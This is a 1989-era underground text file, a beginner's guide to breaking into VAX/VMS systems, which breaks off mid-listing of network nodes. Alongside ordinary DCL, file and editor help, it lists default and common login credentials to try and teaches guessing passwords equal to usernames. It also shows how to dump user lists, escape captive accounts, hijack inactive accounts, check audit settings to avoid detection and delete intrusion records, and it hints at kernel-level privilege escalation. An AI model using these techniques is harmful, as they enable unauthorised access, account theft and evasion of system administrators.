UnderGround Information




+----------------------------------------------------------------------------+

!                     Beginners Guide to VAX/VMS Hacking                     !

!                                                                            !

!             File By ENTITY /  Corrupt Computing Canada  (c)                !

!                                                                            !

!                                                                            !

!                          CORRUPT COMPUTING CANADA!                         !

!                                                                            !

!                                                                            !

+----------------------------------------------------------------------------+

!                                                                            !

! You may freely distribute this file as long as no modifications of any     !

! form are made to the file. All rights reserved by...What rights?!          !

!                                                                            !

!                                                                            !

+----------------------------------------------------------------------------+







INTRODUCTION

------------





       Perhaps the most exciting Operating system to HACK on is VAX/VMS.

It offers many challenges for hackers and boasts one of the best security

systems ever developed.  In comparison to the security on UNIX, VMS is far

superior in every respect.  It can be very difficult to get inside such a

system and even harder to STAY inside, but isn't that what this is all about?!

I have written this file as a way for beginning hackers to learn about the VMS

operating system.  There is such a vast amount of information that can be

related about VAX/VMS hacking that it is not possible for me to cover

everything in just one file.  As such i will try and stick to the basics for

this file and hopefully write another file in the future that deals with

heavy-duty kernal programming, the various data structures, and system service

calls. All right so lets get at it!









GETTING IN

----------



       First of all how do you recognize a VAX when you see one?! Well the

thing that always gives a VAX away, is when you logon you will see:



Username:



It may also have some other info before it asks you for the username, usually

identifying the company and perhaps a message to the effect of:



Unauthorized Users will be prosecuted to the fullest extent of the law!



That should get you right in the mood for some serious hacking!  Ok so when you

have determined that the system you have logged into is indeed a VAX, you will

have to at this point enter your SYSTEM LOGIN.  Basically on VAX's there are

several default logins which will get you into the system. However on MOST

systems these default logins are changed by the system manager. In any case,

before you try any other logins, you should try these (since some system

managers are lazy and don't bother changing them):



Username           Password        Alternate

-------------------------------------------------------------------------------



SYSTEM             MANAGER         OPERATOR

FIELD              SERVICE         TEST

DEFAULT            DEFAULT         USER

SYSTEST            UETP            SYSTEST

DECNET             DECNET          NONPRIV





That's it. Those are the default system users/passwords.  The only ones on the

list that are GUARANTEED to be in the userlist are SYSTEM and DEFAULT. However,

I have never come across a system where these two haven't been changed from

their default passwords to something else.  In the above list, the alternate

password is simply a password many operators set the password to from the

deafult. So if the first password doesn't work, try the alternate password.  It

should be noted when the a user is added into the system, the default password

for the new user the SAME as his username.  You should keep this point in mind

because it is VERY important. Most of the accounts you hack out, will be found

in this way! Ok if above ones don't work,  then you should try these accounts.

These following accounts are NOT defaults, but through experience i have found

that many systems use these accounts or some variation thereof:



Username           Password

---------------------------

VAX                VAX

VMS                VMS

DCL                DCL

DEC                DEC       *

DEMO               DEMO      *

TEST               TEST      *

NETNONPRIV         NONPRIV   *

NETPRIV            PRIV

ORACLE             ORACLE    *

ALLIN1             ALLIN1    *

INGRES             INGRES    *

GUEST              GUEST     *

GAMES              GAMES

BACKUP             BACKUP    *

HOST               HOST

USER               USER      *

DIGITAL            DIGITAL

REMOTE             REMOTE    *

SAS                SAS

FAULT              FAULT

USERP              USERP

VISITOR            VISITOR

GEAC               GEAC

VLSI               VLSI

INFO               INFO      *

POSTMASTER         MAIL

NET                NET

LIBRARY            LIBRARY

OPERATOR           OPERATOR  *

OPER               OPER



The ones that have asterisks (*) beside them are the more popular ones and you

have a better chance with them, so you should try them first. It should be

noted that the VAX will not give you any indication of whether the username

you typed in is indeed valid or not.  Even if you type in a username that does

not exist on the system, it will still ask you for a password.  Keep this in

mind because if you are not sure if whether an account exists or not, don't

waste your time in trying to hack out its password. You could be going on a

wild goose chase!  You should also keep in mind that ALL bad login attempts are

kept track of and when the person logs in, he is informed of how many failed

attempts there were on his account.  If he sees 400 login failures, I am sure

that he will know someone is trying to hack his account.









THE BASICS

----------



Ok i am assuming you tried all the above defaults and managed to get yourself

into the system. Now the real FUN begins!  Ok first things first. After you log

in you will get some message about the last time you logged in etc. If this is

the first time you have logged into this system then you should note the last

login date and time and WRITE IT DOWN! This is important for several reasons.

The main one being that you want to find out if the account you have just

hacked is an ACTIVE or INACTIVE account.  The best accounts are the inactive

ones. Why?! Well the inactive accounts are those that people are not using

currently, meaning that there is a better chance of you holding onto that

account and not being discovered by the system operator.  If the account has

not been logged into for the last month or so, theres a good chance that it

is inactive.  Ok anyhow once your in, if you have a normal account with access

to DCL you will get a prompt that looks like:



$



This may vary from machine to machine but its usually the same. If you have a

weird prompt and would like a normal one, type:



$set prompt=$



If this is the first time you have hacked into this system there are a couple

of steps you should take immediately. First type:



$set control=(y,t)



This will enable your break keys (like ctrl-c) so that you can stop a file or

command if you make a mistake.  Usually ctrl-c is active, but this command will

insure that it is. (Note: in general to abort a command, or program you can

type ctrl-c or ctrl-y) Ok anyhow, the next step is to open the buffer in your

terminal then type:



$type sys$system:rightslist.dat



This will dump a file that has all the systems users listed in it.  You may

notice a lot of weird garbage characters. Don't worry about those, that is

normal.  Ok after this file ends and you get the shell prompt again ($) then

save the buffer, clear it out and leave it open. Then type:



$show logical



Ok after this file is buffered save it also.  Ok at this point you have two

files on your disk which will help you hack out MORE accounts on the system.

For now, lets find out how powerful the account you currently hacked into is.

You should type:



$set proc/priv=all



This may give you a message telling you that all your privileges were not

granted. That's ok. Now type:



$show proc/priv



This will give you a list of all the privileges your account is set up for.

Usually most user accounts only have NETMBX and TMPMBX privs.  If you have

more than these two, then it could mean that you have a nice high-level user.

Unlike UNIX which only has a distinction between user and superuser, VMS has

a whole shitload of different privileges you can gain.  The basic privs are as

follows:



PRIVILEGE      DESCRIPTION

------------------------------------------------------------------------------

NONE           no privilege at all





NORMAL PRIVS

------------

MOUNT          Execute mount volume QIO

NETMBX         Create network connections (you need this to call out!)

TMPMBX         Create temporary mailbox





GROUP PRIVS

-----------

GROUP          Control processes in the same group

GRPPRV         Group access through SYSTEM protection field





DEVOUR PRIVS

------------

ACNT           Disable accounting

ALLSPOOL       Allocate spooled devices

BUGCHK         Make bugcheck error log entries

EXQUOTA        Exceed disk quotas

GRPNAM         Insert group logical names n the name table

PRMCEB         Create/delete permanent common event flag clusters

PRMGBL         Create permanent global sections

PRMMBX         Create permanent mailboxes

SHMEM          Create/delete structures in shared memory





SYSTEM PRIVS

------------

ALTPRI         Set base priority higher that allotment

OPER           Perform operator functions

PSWAPM         Change process swap mode

WORLD          Control any process

SECURITY       Perform security related functions

SHARE          Access devices allocated to other users

SYSLCK         Lock system-wide resources





FILES PRIVS

-----------

DIAGNOSE       Diagnose devices

SYSGBL         Create system wide global sections

VOLPRO         Override volume protection





ALL PRIVS

---------

BYPASS         Disregard protection

CMEXEC         Change to executive mode

CMKRNL         Change to kernal mode

DETACH         Create detached processes of arbitrary UIC

LOG_IO         Issue logical I/O requests

PFNMAP         Map to specific physical pages

PHY_IO         Issue physical I/O requests

READALL        Possess read access to everything

SETPRV         ***  ENABLE ALL PRIVILEGES!!! ***

SYSNAM         Insert system logical names in the name table

SYSPRV         Access objects through SYSTEM protection field





Ok that's the lot of them! I will explain some of the more important privileges

later in the file.  For now, at least you can see just how powerful the account

is.  It should be noted that most accounts usually are only granted the TMPMBX

and NETMBX privileges, so if you don't have the others, don't fret too much.







GENERAL TERMINOLOGY

-------------------



    I think that i should clarify some of the basic concepts involved with

VAX/VMS operating systems before we go any further:



PROCESS: this is what is created when you log in.  The system sets aside CPU

         time and memory for you and calls it a process. Any task that is run

         in VMS is called a process.



SUBPROCESS: also known as child-process, this is just a process that was

            created by another process.



DCL    : Digital Command Language. This is the shell ($) that you are put into

         when you log into a VAX



MCR    : an alternate shell that is used (rarely) on certain accounts. Login

         prompt is a  >  as opposed to DCL which gives a  $

SHELL  : this is the '$' that you see once you are logged in. This is your

         interface with the system, where you can enter the various commands

         execute files and perform other activities.



JOB    : a process and a group of its subprocesses performing some task



SPAWN  : this is the actual command that allows you to create subprocesses

         'SPAWNING' is the act of creating subprocesses



PID    : process identification number. This is an 8 byte ID code that is

         uniquely given to each process that is created on the system.



IMAGE  : this is an EXE file that you can execute (ie run)



UIC    : User identification code. This is in two parts, namely: [group,member]

         The way this works is that users in the same group can access each

         others files through the group protection code.  However since the UIC

         MUST uniquely identify each user, the member portion separates the

         individuals in each group.  If an account does not have a different

         member number, he will NOT be put in the RIGHTSLIST database.







CONTROL KEYS

------------



 A brief note on control sequences.  Several different actions can be activated

via control sequences. They are:



CTRL-H  :delete last character

CTRL-B  :redisplay last command (can go back up to the last 20 commands issued)

CTRL-S  :pause display

CTRL-Q  :continue after pause

CTRL-Z  :*EXIT* use to break out of things such as CREATE and EDIT

CTRL-C  :*CANCEL* will exit out of most operations

CTRL-Y  :*INTERRUPT* will break out of whatever you are doing

CTRL-T  :print out statistical info about the process



NOTE: sometimes upon login, the CTRL-Y, CTRL-C keys are disabled.  To ensure

      these are enabled, issue this command upon login:



$ SET CONTROL





-------------------------------------------------------------------------------

NOTE: all the commands that are executed from DCL can be referenced from an

      online help manual.  To access this, simply type help at any '$' prompt

      This help is also available within the various utilities and programs

      such as authorize and mail. The two MOST important commands are SET and

      SHOW. These should be buffered and printed out for your own reference.

-------------------------------------------------------------------------------



FILES and DIRECTORIES

---------------------



 The directory structure of VMS is a heirarchical one similar to MS-DOS and

UNIX. Its a simple concept, and i will only briefly skim over it.  First of all

it should be noted that there may be more than one hard drive or other

mass-storage device hooked up to your system. Within each hard drive there is

the ROOT directory. This is the highest directory in the tree and is referenced

by [000000]. (this will be explained in a minute)  Within the root there are

several subdirectories. Within these subdirectories there may be files and even

further subdirectories.  The concept is quite simple, but can be difficult to

explain.  Here is a diagram to give you a rough idea of how it is set up:







                                 [000000] <--root directory

                                     !

                                     !

          +--------------------------+---------------------------------+

          !                          !                                 !

          !                          !                                 !

        [d1]                       [d2]                              [d3]

          !                          !                                 !

    +-----+--------+           +-----+-----+                  +--------+

    !     !        !           !           !                  !        !

    !     !        !           !           !              [d3.d3a]  [d3.d3b]

 [d1.da] [d1.db] [d1.dc]    [d2.d2a]   [d2.d2b]

            !                  !           !

            !                  !        +--+-----------+

       [d1.db.db1]        [d2.d2a.d2a1] !              !

                                       [d2.d2b.d2b1] [d2.d2b.d2b2]









    Hopefully this will give you some sort of an idea of how the directories

can be structured. Within each subdirectory there may be other files also. For

example to see the directory after you log in you would type:



$dir



a sample result may be:





Directory DISK$SCHOOL:[REPORTS.JOHN]



average.com;3

generate.exe;1

mail.mai;10

marks.dat;4

marks.dat;5

reportcard.dir

projects.dir



Total 7 files.



What does this tell you? The first line tells you what drive and subdirectory

you are in. The next lines are the actual files. As you can see each file has

a 3 character extension, followed by a comma and a number.  The name before the

period is the actual filename (eg. average) the 3 characters after the period

is known as the extension (eg.com) and the number after the comma refers to the

version of the file. So in this case, this is version number 3.  Any time you

modify or save a file, it automatically assigns it a version number of 1. If

file already exists on your disk, it increments the version number by 1 and

then saves it as such.  So the next time i go ahead and save the file

average.com, it would add another file to the list called average.com;4

  Special note should be taken of the files that have an extension of '.DIR'

These are not really files, but rather subdirectories.  I will show you how to

switch subdirectories in just a minute. First you should take note of the

different file extensions.  Although you can name the files anything you want

some of the more important extensions are:



TYPE      DESCRIPTION

-------------------------------------------------------------------------------

EXE       Executable IMAGE. These files are programs that can be RUN

COM       DCL SCRIPT files. These can also be executed, utilizing the @ command

DAT       DATA file. Sometimes useful things to look at.

LIS       Listing File, many times important info is in here

MAI       Mail file,  use the MAIL command to read these

DIR       DIRECTORY - not a file

JOU       Journal File, often created thru the use of other programs eg EDIT

TXT       Text Files, often hold useful information.



These are just some of the extensions you are most likely to see. The two

important ones are the EXE and COM files. These can be executed from the DCL

level. EXE files are executed via the RUN command. Eg. to run authorize.exe:



$run authorize



This will run the authorize IMAGE. Supposing there were more than one version

of authorize you could specify a version number. eg.



$run authorize.exe;4



The other type of file you can run is the COM files. These are like SCRIPT

files in UNIX or .BAT files from MS-DOS.  They are just a sequence of DCL

commands strung together that are executed when you initiate the file. To run

COM files, use the @ command. For example to run adduser.com, type:



$@adduser



The version number thing i stated for EXE files also applies for COM files.



***NOTE***  To get a listing of all the files on the whole drive, try this:



$sd [000000]

$dir [...]*.*



Similarly you type dir [...]*.com, if you wanted just the COM files listed.

To see the contents of a file, you can use the TYPE command. For example:



$type login.com



this might type out something like:



$ sd:==set default

$ set control=(y,t)

$ set proc/name=entity

$ set term/dev=vt100

         :

         :

         :

        etc



This is great for COM files, DAT files and some of the other types, but you

will always get garbage when you type EXE files so don't bother trying those.

This is very useful for snooping around other peoples files and getting

information. Many times i have found user/passwords lying around in TXT or

LIS files left by some careless user.



 Now, how do you go about changing directories? Well, first you should set up

a shortcut.  The normal command to change directories is SET DEFAULT. For

example to change to a subdirectory called REPORTS, you would have to type:



$set default [.reports]



To make life simpler on yourself, as soon as you log in, you should type:



$sd:==set default



This defines a macro called SD that is interpreted by DCL as SET DEFAULT. You

can similarly define other 'favorite' commands to some short, easy to remember

definition.  Anyhow heres the syntax for changing directories:



SD DEVICE:[dir1.dir2.dir3....]



The device can be optionally left out, if you plan to remain in the same hard

drive. You have to then enter a '[' followed by the root directory, followed

by a period, followed by another subdirectory name etc. Eg.



$sd dub0:[cosy.users]



Suppose at this point, you were in directory cosy, subdirectory users and there

was a further subdirectory called 'info.dir'.  Rather than specify the full

pathname, you can simply type:



$sd [.info]



This will advance you one level into the info subdirectory. Remember to put the

period in front of the subdirectory. If you don't, in this case it would assume

that you were trying to reference the root directory called info.  Another

important thing to note is moving back levels in terms of subdirectories. For

example if you were in [cosy.users.info] and wanted to move back to

[cosy.users] you could type:



$sd [-]



Similarly you can put in as many hyphens (-) as you want to move back. For

example  sd [--]  would put you back to the cosy directory.



Another important thing to note about subdirectories are logical assigned

symbols. These are names assigned to certain things. For example the main

system directory is called sys$system. So to go to it you could type:



$sd sys$system



This would throw you into the system directory. Similarly you can type:



$sd sys$login



and this will put you back into the directory that you were initially in, when

you first logged in.  These symbols stand for actual device:directory

combinations.  To see the various definitions that are assigned to each process

you should type:



$show logical



This will list a whole bunch of global system equates that you can use to

access various parts of the VAX structure.  In addition to view all of your

locally defined symbols, use:



$show symbol *







FILE PROTECTION

---------------



Ok before i begin this, let me just state that whatever i say about files also

applies to directories.  There are four types of file protections. There is

SYSTEM,WORLD,GROUP and OWNER. These are briefly:



SYSTEM- All users who have group numbers 0-8 and users with physical or logical

        I/O privileges  (generally system managers, system programmers, and

        operators)

OWNER - the owner of the file (or subdirectory), isolated via their User

        Identification Code (UIC). This means the person who created the file!

GROUP - All users who have the same group number in their UICs as the owner of

        the file.

WORLD - All users who do not fall in the categories above



Each file has four types of protection within each of the above categories.

They are: Read, Write, Execute, Delete. Explanations are:



READ   - You can read the file and copy it.

WRITE  - You can modify and rename that file.

EXECUTE- You can run the file

DELETE - You can delete the file



When you create a file the default is that you have all the privileges for that

particular file. Group, world and system may only have limited privileges. This

can be changed with the set protection DCL command. For example:



$set protection=(group:rwed,world:r)/default



would set your default protection to allow other users in your group to have

full read,write,execute,delete privs to the file, and others only read access

to the file. The /default means that from now on all the files you create will

be set with this particular protection.  To change one of your own files to

some other protection you can alternatively use:



$set prot topsecret.dat /prot=(system:rwed,group:rwed,world:rwed,owner:rwed)



This would enable all users on the system to access the file 'topsecret.dat'

When specifying the protection, you do not have to list them for each of the

four groups.  You can simply choose only those that you want changed from your

default.







EDITING FILES

-------------



  An important utility that all VAX hackers should be familiar with is the EDT

text editor. To call it up, use the EDIT DCL command. ie:



$edit [filename]



This will invoke the EDIT/EDT text editor.  The [filename] refers to the file

that you want to edit.  If the file does not exist, it is created at this point.

The EDT editor does not provide a default file type when creating files, so if

you do not specify one, it will leave it as NULL.  It should be noted that there

is more than just the EDT editor, but when you type in EDIT, the default is

/EDT.  Basically it is an editor that you can use to create/modify COM or any

other type of text files.



 After the editor is invoked, it keeps track of everything that you enter in a

JOU file.  In case of lost carrier or some other accident, you can recover what

you had by specifying the /RECOVER qualifier. For example:



$edit/recover memo.dat



This would take the last copy of memo.dat, load it into memory, then process

your last JOU file, updating it to virtually exactly where you were before you

got cut off.  Journaling is automatically defaulted to ON, but can be turned

off with the /NOJOURNAL qualifier.  For a description of what all the qualifiers

are, and what they do, refer to the online HELP manual.



 Ok here is a list of the basic commands you can perform in the EDT editor:





--------------------------------------------------------------------------------



X   (where X = line number)............show line X only

X:Y (where X,Y = line numbers).........show line X through line Y

A,B,C,D (a,b,c,d = line numbers).......list lines A,B,C,D

X:e ...................................list from X to end

T W ...................................TYPE WHOLE. List ALL of the text lines

S/string1/string2/W....................substitute ALL occurrences of string1

                                       for string2 as they occur from current

                                       line number downwards

"string" ..............................search for first occurrence of string

                                       from current line downwards

T A "string" ..........................type all occurrences of string from

                                       current line downwards

X:Y a "string" ........................search for occurrences of string within

                                       range denoted by X through Y

D X ...................................Delete line X

D X:Y .................................Delete line X through Y, inclusively

I .....................................insert a line

I X ...................................insert from line X

M X:Y to Z ............................move lines X through Y to line Z

RES ...................................resequence line numbers

RES/SEQ:X:10 ..........................resequence from line X in intervals of 10

R X ...................................replace from line X. This deletes the

                                       current line and automatically goes into

                                       insertion mode.

EXIT ..................................leave the editor, and SAVE the current

                                       text.

QUIT ..................................leave the editor and DO NOT SAVE the

                                       current text.



--------------------------------------------------------------------------------



A sample editing session is shown:



$edit lame.txt



* i



     hi this is just some bullshit text to test out how this EDIT program

     works.  Oh well, easy enough.  bye!



     



*exit



$type lame.txt



 hi this is just some bullshit text to test out how this EDIT program

 works.  Oh well, easy enough.  bye!



$del lame.txt;*



COMMANDS

--------



In this section i will outline some of the more important commands that you can

issue from the DCL level. This is not meant to be a complete guide. I will

merely point out some of the more important commands and a very brief

description. Proper help can be obtained from the online HELP facility.





NOTE: It should be noted that each of the following commands may have further

----- qualifiers that you can specify. You should check up on these from the

      online help also.





@               -Lets you execute COM script files

ACCOUNTING      -allows you to view and edit system accounting data that keeps

                 track of what system time you have racked up.

ANALYZE         -lets you view the contents of OBJ files in HEX/ASCII format.

ANALYZE/SYSTEM  -Invokes the SDA. VERY VERY USEFUL!! Allows you to view other

                 running processes, their type-ahead buffers etc.

APPEND          -appends the contents of file1 to file2

ATTACH          -allows you to attach yourself to one of your subprocesses

CLOSE           -closes a file that was opened for input/output via OPEN

CONTINUE        -continue a process that you have aborted with control-y

COPY            -copy file1 to file2. You can specify full pathnames, with

                 device and subdirectory. If you want to copy it to your home

                 directory just use sys$login as your 'TO' file.

CREATE          -create a text file of any type. Eg. you want to create a

                 simple COM file or perhaps a letter to another hacker on the

                 system. (you shouldn't be using MAIL to send messages!)

CREATE/DIR      -If you want to create a subdirectory

DELETE          -delete a filename. Remember to specify a version number when

                 you are deleting a file or it wont work.eg. del garbage.com;1

DELETE/INTRUSION_RECORD -gets rid of the failed password attempts

DIFFERENCES     -compares two files and notifies you of their differences

DIRECTORY       -get a directory of the files. Various qualifiers can be chosen

DUMP            -get a hex/ascii file dump

EDIT/EDT        -invokes the VAX EDT interactive text editor

EXAMINE         -view the contents of virtual memory

HELP            -ONLINE HELP MANUAL. REFER TO IT OFTEN!

LINK            -link object files into EXE files that you can run

LOGOUT          -the proper way to terminate a session

PHONE           -Allows you to chat with another user on the system. It is not

                 recommended that you use this, except with fellow hackers.

RENAME          -rename a file or directory

RUN             -lets you execute EXE files

SET CONTROL     -disables/enables interrupts via ctrl-y/ctrl-c

SET DEFAULT     -change directories

SET HOST        -allows you to connect to another mainframe

SET PASSWORD    -change the password of your account

SET PROCESS     -change the characteristics of your process

SET PROMPT      -change the prompt ($)

SET TERMINAL    -change your terminal characteristics

SHOW ACCOUNTING -show the current security/accounting enabled

SHOW AUDIT      -show SECURITY enabled

SHOW DEFAULT    -see your current directory. (Like PWD in UNIX)

SHOW DEVICES    -check out the system setup

SHOW INTRUSION  -view the contents of the breakin database

SHOW LOGICAL    -current logical name assignments

SHOW NETWORK    -lists all the available nodes that you can connect to

SHOW PROCESS    -View your process settings

SHOW PROTECTION -show the default protection you have set

SHOW SYSTEM     -useful to see the running processes

SHOW TERMINAL   -display your terminal characteristics

SHOW USERS      -see who else is logged in.

SPAWN           -spawn a subprocess

STOP            -kill off a subprocess

TYPE            -view a file





  This should give you a general overview of some of the more important

commands that you can use.  It would be impossible for me to list ALL the

commands, and their descriptions, so i suggest that you go through the online

HELP facility and familiarize yourself with the syntax of some these commands.





HACKING

-------



Up to this point i have mainly discussed the basic concepts involved with VMS.

By now you should be familiar and comfortable with the various DCL commands

and how to accomplish certain tasks.  If you are still sketchy, go back and

re-read the sections you don't understand.  You may also want to log into a VAX

and just try fiddling around in the shell getting used to how the whole thing

works.



 In this section i will discuss some of the techniques that you may find useful

in hacking out accounts, calling out to remote systems, and gaining access to

confidential information.





 Lets start from the top: When you first login to the system, after it accepts

your password etc, it executes the SYLOGIN.COM file.  Then it searches your

default directory for the file LOGIN.COM (this may be changed by the system

manager if he wishes)  This file basically sets up your terminal parameters and

perhaps some macros that you wish to be defined. It may or may not also execute

some utility.





BYPASSING LOGIN.COM

-------------------



 Sometimes it may be useful to be able to skip the login procedures. For

example if the system automatically runs some file as soon as you log in, and

doesn't put you into the shell, this technique can be used:



Username: entity/nocomm



Assuming the user was named entity, if you put a /nocomm qualifier, it will

skip the login.com file and put you directly into DCL. Similarly you can

specify some other file you want executed instead of login.com. eg.



Username: entity/comm=custom.com



This will execute the custom.com file upon entry into the account.  It should

be noted that these methods WILL NOT WORK on a CAPTIVE account. What is a

captive account?! Read on...





CAPTIVE ACCOUNTS

----------------



 Many times, in an attempt to make an account more secure the system manager

sets the captive flag to ON, in the users profile.  What this means is that

when you log in, you cannot break out of the login file into the DCL shell.

This means that although you can hit ctrl-y and it may even say *interrupt*

it will not actually abort the file.  So how do you exit to DCL?! Well there

are a few ways. Usually accounts set up in this manner are used to allow the

user to connect to other nodes.  If this is the type of account that you have

logged into then try the following:  First choose an option from the menu that

they present that allows you to call any node.  When it says something like

%connected to...  then hit two ctrl-y in quick succession.  It will then ask

you if you want to really abort the current session. Type Y and it will put you

at a prompt that looks like:



PAD>



At this point you should type in SPAWN and it will spawn a process and throw

you into the DCL Shell.  This is a major security flaw in VMS and can be put to

good use on many a system.





GAINING PRIVILEGES

------------------



On most systems that you hack into, you will find yourself with only TMPMBX and

NETMBX privileges. To see your privs type:



$show proc/priv



These however may not be all the privileges that you have assigned. Upon login,

the system only assigns you your default privileges. On some accounts you may

have more than just these privileges. To see if you do, type:



$set proc/priv=all



if this doesn't give you any error message then you have found yourself a

SYSTEM account! With this account you can create new users, change the security

setup read other peoples files etc.  Here are a list of some of the more

important privileges and what they can be used for:



CMKRNL    -change to kernal mode. Very Powerful privilege!!

SETPRV    -allows you to become a Super-User. You can do whatever you want!

READALL   -allows you to read other peoples files and directories regardless

           of the protection

OPER      -allows you to perform many useful operator functions (security etc)

SYSPRV    -You can gain the same UIC as the system and access just about

           anything you want. Create/modify accounts

NETMBX    -allows you to call out on the network to other systems

BYPASS    -this allows you to view network passwords, and to bypass all types

           of protection fields



These are just some of the more important ones to the hacker.  For a complete

list of all the privileges and what each one does, see the list i presented

earlier in the file.



One important note: It is not possible to gain privileges that are not set up

in your default from the DCL level.  There is one way to gain ALL privileges on

ANY Vax but it involves some serious kernal programming.  I could outline the

program here but i chose not to.  The reason for this is that many people would

abuse the system if they had access to wiping out hard drives and totally

trashing the system.  If you work from the ground up, you begin to realize just

how important gaining extra access is. You begin to respect the VMS system for

what it is.  A system account in the hands of novice is a very dangerous thing

indeed, and my suggestion is that if you have a SYSTEM account that has more

than just the default privileges that you should disable them.  This will only

help you from making any mistakes and screwing up the system.  To do this type:



$set proc/priv=noall

$set proc/priv=(tmpmbx,netmbx,readall)



With these privileges you should be able to easily navigate throughout the

system without messing anything up.  Keep one thing in mind, don't delete files

unless you have created them! People will notice things like this and you are

guaranteed to lose your account.



 Once you are an experienced hacker you may wish to create a program that gives

you more privileges.  To get you started in this direction i will give you

an excerpt out of the 'VAX/VMS internals and data structures' manual:





If a process wishes a privilege that is not in its authorized list, one of two

conditions must hold or the requested privilege is not granted.



1)The process must have SETPRV privilege.  A process with this privilege can

  acquire any other privilege with either the set privilege system service or

  DCL command SET PROCESS/PRIVILEGES.



2)The system service was called from executive or kernal mode. This mechanism

  is an escape that allows either VMS or user-written system services to

  acquire whatever privileges they need without regard for whether the calling

  process has SETPRV privilege.  Such procedures must disable privileges

  granted in this fashion as part of their return path.





That should give you an idea of what is necessary to go about writing a program

that grants you extra privileges.  For those advanced programmers, here is the

relevant information:







Symbolic name   Location           Usage                          Referenced By

---------------+------------------+------------------------------+-------------

PHD$Q_PRIVMSK  !process header    !working privilege mask        !system srvc's

PCB$Q_PRIV     !PCB               !same as phd$q_privmsk         !device driver

CTL$GQ_PROCPRIV!P1 Pointer page   !permanently enabled privs     !SET UIC

PHD$Q_AUTHPRIV !process header    !procs allowable privs         !$setprv

PHD$Q_IMAGPRIV !process header    !mask for enhanced priv images !$setprv

UAF$Q_PRIV     !sysuaf.dat        !UAF allowable privs           !LOGINOUT

KFI$Q_PROCPRIV !priv install image!image installed with privs    !image actvatr

IHD$Q_PRIVREQS !image header      !unused - set for all privs!   !image actvatr

---------------+------------------+------------------------------+-------------







ONLINE SECURITY

---------------



Version 4.2 of VMS introduced the security auditing features.  These features

can be used to track down hackers and illegal use of the machine. Things such

as access to files, login failures, process creation, adding users etc can all

be monitored and logged.  After you have logged into an unknown system, it is

wise to check what kind of security they have enabled on the system. This is

done in two ways. First you should try:



$show accounting



Normally this will either say accounting is disabled or will have a list of

items that are being monitored.  This is used mainly for charging the users for

CPU time etc.  What you should check for in this list is if IMAGE accounting

is enabled.  If it isn't, then you can relax. If it is, you know that you have

a smart system manager here and you will have to take extra precautions when

fiddling around on this machine.  The second thing you should check is the

actual level of security enabled.  Generally this feature is disabled, and you

have nothing to worry about. To see the security type:



$show audit



One thing to note is that you must have the SECURITY privilege to issue this

command. An especially secure system may have things such as breakins, logins,

logfailures, file access (both successes and failures),and authorization

checks.  These systems require a tremendous amount of care, and are not a good

place to start learning about VMS.



Another important thing that you should keep in mind is that VAX/VMS stores

information about login failures (invalid password, account expired, unknown

username).  A security manager can identify possible breakin attempts by using:



$show intrusion/type=intruder



This command requires the CMKRNL and SECURITY privileges.  An interesting thing

to note is that the system manager can have the VAX do certain things after it

has determined that the user trying to log in is not legitimate.  For example

it can block all login attempts from a certain terminal, or it could turn off

accepting passwords for a certain account for a specified period of time. So

lets suppose you were hacking an account and after 10 tries actually entered

the right password.  If the intrusion alert is set at 5 tries, then even if you

enter the correct password, it wont let you in!!





EXPIRED PASSWORDS

-----------------



I want to make a quick note here about expired passwords.  Often you will find

after logging into an account that it will say that your password has expired

and for you to enter a new password.  At this point you should check when was

the last date of access. If it was only a few days ago, then you should forget

about this account.  If it more than a few weeks ago, then you have found your-

self an INACTIVE account (ie one that is not in use anymore)  The first thing

that you should do is set a new password. For example:



$set password



Passwords can be from 1-31 characters in length and can contain the following

characters:



A-Z

a-z

0-9

$ (dollar sign)

_ (underscore)



Note that uppercase, and lowercase are not differentiated (unlike UNIX).  The

reason that you should enter a password at this point is that if you don't, the

next time the account will not let you log in since the password has expired.









GAINING MORE ACCOUNTS

---------------------



Once you have managed to hack onto a VAX, often you will want to gain more

accounts on the system.  There are several ways to go about doing this.  The

first way is to get a list of all the users on the system.  Remember that the

default password for any account is the same as the username. Well if you have

a list of users, theres a good chance you may find a few who haven't bothered

to change their passwords.  There are a few methods of viewing the userlist.

The simplest, but least readable way is to:



$type sys$system:rightslist.dat



and buffer the incoming information. You will notice some garbage characters

also sent through.  The way this file is set up is a 1-2 byte character ID

followed immediately by a 32 byte string with the username.  So to pick out the

usernames, simply ignore the first character from each name, and then you have

the usernames. There is one small problem to this. Sometimes the character ID

in front of the name is a SPACE.  In this case, you would still skip the first

character (which is a space), but in viewing the name you would take all the

characters.  So you just have to use your judgement when looking at this list

to determine whether the string is the whole name, or whether it has an ID

code stuck in the beginning. The problem is that the ID code is not necessarily

a garbage character, it could be any valid ascii character (spaces,letters,

numbers etc)  The thing that you should keep in mind is that these ID codes are

grouped together, so you may see several names that all start with 'A' and you

can assume that this is the ID and not part of the actual name.

  Another method which is a bit slower, but a lot neater is to use the DUMP

command on the rightslist file:



$dump sys$system:rightslist.dat



This is quite useful, because it automatically strips away control characters,

and puts each name into a separate record which makes it easy to isolate the

proper login names.



  An alternative method is to run the psi$authorize file from the system dir.

To do this, type:



$mc psiauthorize



When you get the PSI-authorize prompt, type:



PSI-authorize> show /id *



This will list all the users on the system. The drawback to this method is that

the system that you are on, may have taken out the PSI utilities from the

system directory.  The PSI utilities are used mainly for remotely connecting

to other mainframes.

 A third method to get a listing of all the users is to go through the sysuaf

database.  On most accounts this is usually not possible , since most users do

NOT have read/write access to sysuaf.dat.  If you DO have access to this file

(ie you have readall or setprv etc) then you can run authorize:



$sd sys$system

$run authorize



Then when you get the UAF prompt, type:



UAF>show [*,*] /brief



 The added bonus of doing it this way is that you can also find out things such

as the users home directory, when was the last time they logged in, what their

privileges are etc.  Easy to isolate the good accounts on the system that you

may want to hack at. It should be noted however, that if you CAN perform this

command, then you also have the priv's to create your own user, or better yet

change the password on an inactive account.

 There is another possibility that sometimes works on many systems.  Often, the

system manager uses the LIST command from AUTHORIZE and what it does is produce

a user listing in the file called: SYSUAF.LIS in the SYS$SYSTEM directory. If

he has done this, unless he explicitly changes the protection on the file, this

file has WORLD READ access.  In other words, anyone can go in and type out the

file. To do this try:



$type sys$system:sysuaf.lis



   Ok so lets assume that you have used one of these methods and have come up

with a list of all the users on the system. Now comes the tedious part. What

you have to do is log back into the system, and try each of the names out. For

the password, enter the same thing as you did for the username.  This is a long

and boring process depending on how large the userbase is, but it usually

yields a few good accounts.



 Another interesting variation on this, is to get accounts on remote nodes that

are linked with your VAX.  To see other nodes that are accessible from your

VAX, type:



$show net



This will produce a listing like:







VAX/VMS Network Status for local node 2.161 NORTELCOM on 01-SEP-1989



The next hop to the nearest area router is node 2.62 BELCAN



Node                 Links     Cost    Hops   Next Hop to Node



